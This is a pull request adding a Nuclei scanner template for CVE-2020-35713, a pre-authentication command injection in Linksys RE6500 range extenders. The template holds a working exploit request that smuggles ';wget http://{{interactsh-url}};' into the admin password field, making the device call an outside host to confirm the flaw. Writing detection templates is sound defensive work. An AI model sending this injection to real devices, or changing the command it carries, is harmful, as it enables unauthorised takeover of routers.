### PR TITLE
Create CVE-2020-35713.yaml

### DIFF
--- a/cves/2020/CVE-2020-35713.yaml
+++ b/cves/2020/CVE-2020-35713.yaml
@@ -1,0 +1,29 @@
+id: CVE-2020-35713
+
+info:
+  name: Linksys RE6500 Pre-Auth RCE
+  author: gy741
+  severity: critical
+  reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
+  description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
+  tags: cve,cve2020,linksys,rce,oob
+
+requests:
+  - raw:
+      - |
+        POST /goform/setSysAdm HTTP/1.1
+        Host: {{Hostname}}
+        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
+        Accept-Encoding: gzip, deflate
+        Accept: */*
+        Connection: keep-alive
+        Origin: http://{{Hostname}}
+        Referer: http://{{Hostname}}/login.shtml
+
+        admuser=admin&admpass=;wget http://{{interactsh-url}};&admpasshint=61646D696E=&AuthTimeout=600&wirelessMgmt_http=1
+
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"

--- a/cves/2020/CVE-2020-35713.yaml
+++ b/cves/2020/CVE-2020-35713.yaml
@@ -6,7 +6,7 @@ info:
   severity: critical
   reference: https://resolverblog.blogspot.com/2020/07/linksys-re6500-unauthenticated-rce-full.html
   description: Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
-  tags: cve,cve2020,linksys,rce,oob
+  tags: cve,cve2020,linksys,rce,oob,router
 
 requests:
   - raw:


### PR DESCRIPTION
### Template / PR Information

Hello

Added CVE-2020-35713 detection rule.

Thanks.

```
Belkin LINKSYS RE6500 devices before 1.0.012.001 allow remote attackers to execute arbitrary commands or set a new password via shell metacharacters to the goform/setSysAdm page.
```

### Template Validation

I've validated this template locally?
- [ ] YES
- [V] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/.github/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)